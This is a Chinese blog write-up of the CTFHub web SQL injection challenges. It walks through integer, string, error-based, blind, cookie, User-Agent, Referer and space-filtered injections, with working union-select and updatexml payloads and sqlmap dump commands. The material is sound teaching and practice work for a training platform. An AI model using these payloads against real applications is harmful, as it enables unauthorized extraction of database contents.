题解记录-CTFHub技能树|Web|SQL注入

最新推荐文章于 2024-04-18 21:36:30 发布
最新推荐文章于 2024-04-18 21:36:30 发布
阅读量2.1k 收藏 28
点赞数 6
分类专栏: CTFHub技能树 文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57448435/article/details/126843920
版权

CTFHub技能树-Web-SQL注入

文章目录

前言

在这里插入图片描述

一、整数型注入

在这里插入图片描述
已知是整数型注入,故可直接判断字段数
当order by 3 时报错,说明有2个字段

在这里插入图片描述
为了保证之前的数据查询不出来,将1改为-1,然后输入-1 union select 1,2 进行查询

在这里插入图片描述
在2的位置查询数据库名,输入-1 union select 1,database(),得到数据库名为sqli

在这里插入图片描述
接下来获取数据库表名,输入-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘sqli’,发现flag表

在这里插入图片描述
获取flag表的字段名,输入-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘flag’,发现字段flag

在这里插入图片描述
查询flag字段值,输入-1 union select 1,flag from sqli.flag,获得flag

在这里插入图片描述

二、字符型注入

字符型注入,用#来过滤掉后面的 ’
先判断字段数,输入1’ order by 1/2/3… #,发现到3时报错,即字段数为2

在这里插入图片描述
联合查询数据库名,输入 -1’ union select 1,2# 与 -1’ union select 1,database()# 获得数据库名sqli

在这里插入图片描述在这里插入图片描述
接着查询表名,输入-1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘sqli’#,发现flag表

在这里插入图片描述
查询flag表的字段,输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘flag’#,发现flag字段

在这里插入图片描述
查询flag字段值,输入-1’ union select 1,flag from sqli.flag#,获得flag

在这里插入图片描述

三、报错注入

报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的,就是在可以进行sql注入的位置,调用特殊的函数执行,利用函数报错使其输出错误结果来获取数据库的相关信息

在这里插入图片描述
先判断字段数,发现3时报错,即字段数为2

在这里插入图片描述
这里使用updatexml()构造payload
select updatexml(“abc”,“//div/p/text()”,“abcd”) 的意思是把"abc"换成"abcd" ,而服务器要通过xpath路径"//div/p/text()“找到"abc”
这时如果xpath路径格式出错了,则会把校验xpath路径后的结果通过报错信息显示出来,如果我们把xpath路径改成我们想知道的信息,结果就会通过报错信息显示出来。
输入-1 and updatexml(1,concat(1,database()),2) 就可以通过报错信息得到当前服务器使用数据库的名字’sqli’

在这里插入图片描述
接下来获取表名,输入-1 and updatexml(1,(concat(1,(select group_concat(table_name) from information_schema.tables where table_schema =‘sqli’))),2)
,发现flag表

在这里插入图片描述
获取flag表字段,输入-1 and updatexml(1,(concat(1,(select group_concat(column_name) from information_schema.columns where table_name =‘flag’))),2),发现flag字段

在这里插入图片描述
获取flag字段值,输入-1 and updatexml(1,(concat(1,(select flag from sqli.flag))),2),得到flag

在这里插入图片描述

四、布尔盲注

发现只回显query_success和query_false
在这里插入图片描述
手工注入太繁琐,这里使用sqlmap工具(可能需要点时间)
爆库,输入python sqlmap.py -u “url” --dbs,发现sqli库

在这里插入图片描述在这里插入图片描述
爆表,输入python sqlmap.py -u “url” -D sqli --tables,发现flag表

在这里插入图片描述
爆列,输入python sqlmap.py -u “url” -D sqli -T flag --columns,发现flag字段

在这里插入图片描述
爆字段,输入python sqlmap.py -u “url” -D sqli -T flag -C flag --dump,得到flag

在这里插入图片描述

五、时间盲注

在这里插入图片描述
同样,这里使用sqlmap工具
爆库,输入python sqlmap.py -u “url” --dbs --batch(–batch表示自动执行,无需手动输入y),发现sqli库

在这里插入图片描述
爆表,输入python sqlmap.py -u “url” -D sqli --tables,发现flag表

在这里插入图片描述
爆列,输入python sqlmap.py -u “url” -D sqli -T flag --columns,发现flag字段

在这里插入图片描述
爆字段,输入python sqlmap.py -u “url” -D sqli -T flag -C flag --dump,得到flag

在这里插入图片描述

六、MySQL结构

本题与整数型注入类似
判断字段数,到3时报错,则字段数为2
在这里插入图片描述
查询数据库名,为’sqli’

在这里插入图片描述
查询数据库表名,发现一个与之前不一样的epusvxnajl表

在这里插入图片描述
查询表字段,发现kdmwpiyetq字段

在这里插入图片描述
查询该字段值,得到flag

在这里插入图片描述

七、Cookie注入

抓包,将之前的输入框换成在cookie处注入
判断出是整数型注入
在这里插入图片描述
判断字段数,当order by 3 时报错,说明有2个字段

在这里插入图片描述
查询数据库名,得到数据库名为sqli

在这里插入图片描述
获取数据库表名,发现目标表

在这里插入图片描述
获取flag表的字段名,发现目标字段

在这里插入图片描述
查询字段值,获得flag

在这里插入图片描述

八、UA注入

抓包,判断是整数型注入后,与cookie 的处理方式相同,只是代码位置不同
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

九、Refer注入

抓包,没有refer的话,自行加上,判断是整数型注入后,与cookie 的处理方式相同,只是代码位置不同

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

十、过滤空格

测试发现是整数型注入,本题过滤了空格,故用/**/来代替空格
之后的操作就和之前整数型注入相同,只是不使用空格
最终得到了flag

在这里插入图片描述在这里插入图片描述

总结

手工注入:判断注入类型,判断字段数,查询数据库名,查询数据库表名,查询表字段名,获得字段值
sqlmap工具:爆库,爆表,爆列,爆字段

TTjsm1
关注
  • 6
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFHub 技能树SQL注入
滚滚是只小狐狸
03-05 1045
标题CTFHub 技能树SQL注入 进入CTFHub官网 一:SQL整数型注入 开题出现的界面是这样的,根据提示输入 1 后,出现两处回显,这里可以使用 工具注入也可以使用手工注入。 手工注入可以看一下这个博主写的查看手工注入 如果想了解工具的话就继续往下看吧☺ 我使用的是 kali 自带的 sqlmap 工具 1)因为一开始我们就已经知道存在注入点,于是这个步骤可有可无,但是还是可以看看数...
CTFHUB-技能树-WEB-SQL注入
慢就是快
04-16 297
文章目录1.整数型注入2.字符型注入3.报错注入4.布尔注入5.时间盲注5.MYSQL结构6.Cookie 注入7.UA注入8.Referer注入9.过滤空格 1.整数型注入 ?id=-1 order by 2 --+ true # 两个字段 ?id=-1 order by 3 --+ false ?id=-1 union select 1,2 --+ --+ #说明存在两个显示位置,id=-1是为了将显示位置腾空,方便回显数据显示 id=-1 union select 1,group_concat(s
ctfhub web全部做题记录(持续跟新)
01-08
信息泄露 目录历遍 直接找就行。。。 PHPINFO 进去直接 ctrl+f 搜flag就行。。。 备份文件下载 网站源码 提示一些相关的名字 可以写个简单的脚本爆破一下 当然也可以 dirsearch 直接扫 import requests url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
CTFHubweb SQL注入
最新发布
2301_81105268的博客
04-18 1022
id=1这个语句在数据库中返回几列,也就是SELECT * FROM uers WHERE id=1 and 1=2 LIMIT 1,0这个语句的数据结果集有几列,然后才可以用union进行联合查询。(2)可以用concat()或concat_ws()或group_concat()—[见数据库连接语句]----使得在sql注入时快速获得数据库的相关信息。使用order by语句进行测试:1 order by 1、1 order by 2等,直到报错为止,报错的前一个数,为字段数。
CTFHub技能树 Web-SQL注入详解
千寻的博客
11-21 1874
所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通过构造特殊的输入字符串使后端程序错误地识别SQL查询语句中的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。
ctfhub技能树web--sql注入
m0_64636395的博客
05-15 742
SQL 注入是一种将 SQL 代码插入或添加到应用(用户)的输入参数中,之后再将这些参数传递给后台的 SQL 服务器加以解析并执行的攻击。攻击者能够修改 SQL 语句,该进程将与执行命令的组件(如数据库服务器、应用服务器或 WEB 服务器)拥有相同的权限。如果 WEB 应用开发人员无法确保在将从 WEB 表单、cookie、输入参数等收到的值传递给 SQL 查询(该查询在数据库服务器上执行)之前已经对其进行过验证,通常就会出现 SQL 注入漏洞。提示:以下是本篇文章正文内容,下面案例可供参考。
CTFHub技能树 Web-SQL注入 详解
weixin_45808483的博客
11-16 3963
整数型注入 我们输入 1 不断尝试发现闭合方式就是 1 ,整数型 存在两列 order by 2 存在两个注入点 /?id=-1 union select 8,9 爆库,当前数据库sqli /?id=-1 union select 8,database() 爆出所有表名,这里我们需要吧sqli转换为16进制 /?id=-1 union select 8,group_concat(table_name) from infromation_schema...
web-ctf-writeups
05-10
web-ctf-writeups web狗爬坑中的学习的writeup整合。 如果有师傅认为侵权,请联系我删除。另欢迎各位师傅投递链接。该repo会不断更新,最近更新日期为:2018/6/26。 N1CTF 大部分题解 777&&777 2&&babysqli Easy&&...
Leetcode_回文数_题解_19.9.21_21|19_leetcode_C++_
09-28
判断字符串是否为回文数,leetcode原题,使用多种方法
Hacker101-CTF
04-19
黑客101-CTF 解释 HackerOne; 这是一个漏洞平台,可将企业与渗透测试人员和网络安全研究人员联系起来。 此平台上的Hacker101是针对Web安全域的易受攻击的免费类。 受漏洞的启发,该课程使用户可以练习自己的举报...
leetcode题库-Leetcode-Hub:Leetcode题解InJava
06-29
题解 In Java。 在线阅读: 介绍 世界上并没有完美的程序,但我们并不因此而沮丧,因为写程序本来就是一个不断追求完美的过程。 本地开发 & 阅读 本项目基于 vuepress 进行开发,以提供比 github mardown 更佳的阅读...
力扣题解大全-600多页版
08-29
涵盖中高级、各种基本算法和数据机构的运用
CTFHub-SQL注入
yuqie的博客
06-13 868
当传入的ID参数为and 1=2时,由于1=2不成立,所以返回假,页面就会返回与id=1不同的结果。需要注意的是,当level默认为1的时候,默认不扫cookie的内容,必须是level大于等于2才能扫cookie里的内容,所以这里选用level 2.很明显,直接使用rand函数每次产生的数值不一样,但当我们提供了一个固定的随机数的种子0之后,每次产生的值都是相同的,这也可以称之为伪随机。配合上floor函数就可以产生确定的两个数,即0和1并且结合固定的随机种子0,它每次产生的随机数列都是相同的值。
CTFHUB-SQL注入
m_de_g的博客
08-11 5444
** CTFHUB-SQL注入 ** 一、SQl注入的基础 1.介绍SQL注入 SQL注入就是指WEB应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数代入数据库查询,攻击者可以通过构造不同的SQL语句来是实现对数据库的任意操作。 一般情况下,开发人员可以使用动态SQL语句创建通用、灵活的应用。动态SQL语句是在执行过程中构造的,他根据不同的条件产生不同的SQL语句。当开发人员在运行过程中需要根据不同的查询标准决定提取什么字段(如select语句),或者根据不同的条件选择不同
CTFHUB--SQL注入
m0_65766842的博客
03-14 180
1
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1063
ctfhubSQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
CTFHub-sql注入
qq_60905276的博客
01-30 5646
1.整数型注入 先判断有没有注入点 ?id=1 and 1=1 ?id=1 and 1=2 证明有注入点 在输入1看看。 有回显。
CTFHUB-web-SQL注入
ookami6497的博客
11-29 714
CTFHUB SQL
CTFHub(SQL注入)
cxiaodi的博客
05-09 1249
CTFHubSQL注入专题)
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取数据库中的某个表的内容。 2. 分析注入点:首先,我们需要找到注入点。可以通过在输入框中输入一些特殊字符(如'、"、;等)来尝试触发SQL注入。如果页面返回异常或者显示不正常,那么很可能存在注入点。 3. 判断注入类型:确定注入点后,我们需要判断注入类型。可以通过在输入框中输入一些测试语句(如' or 1=1--)来判断是否存在注入漏洞。如果页面返回正常,那么很可能存在注入漏洞。 4. 获取数据库信息:一旦确认存在注入漏洞,我们可以通过构造合适的SQL语句来获取数据库信息。可以使用UNION SELECT语句来获取表的列数和列名,然后使用SELECT语句获取表的内容。 5. 构造SQL语句:根据题目要求,我们需要获取某个表的内容。可以使用如下语句来获取表的内容: SELECT column_name FROM information_schema.columns WHERE table_name='表名'; SELECT * FROM 表名; 6. 获取结果:根据构造的SQL语句,将其作为输入发送给服务器,获取返回的结果。根据返回的结果,我们可以得到表的列数、列名和表的内容。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TTjsm1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值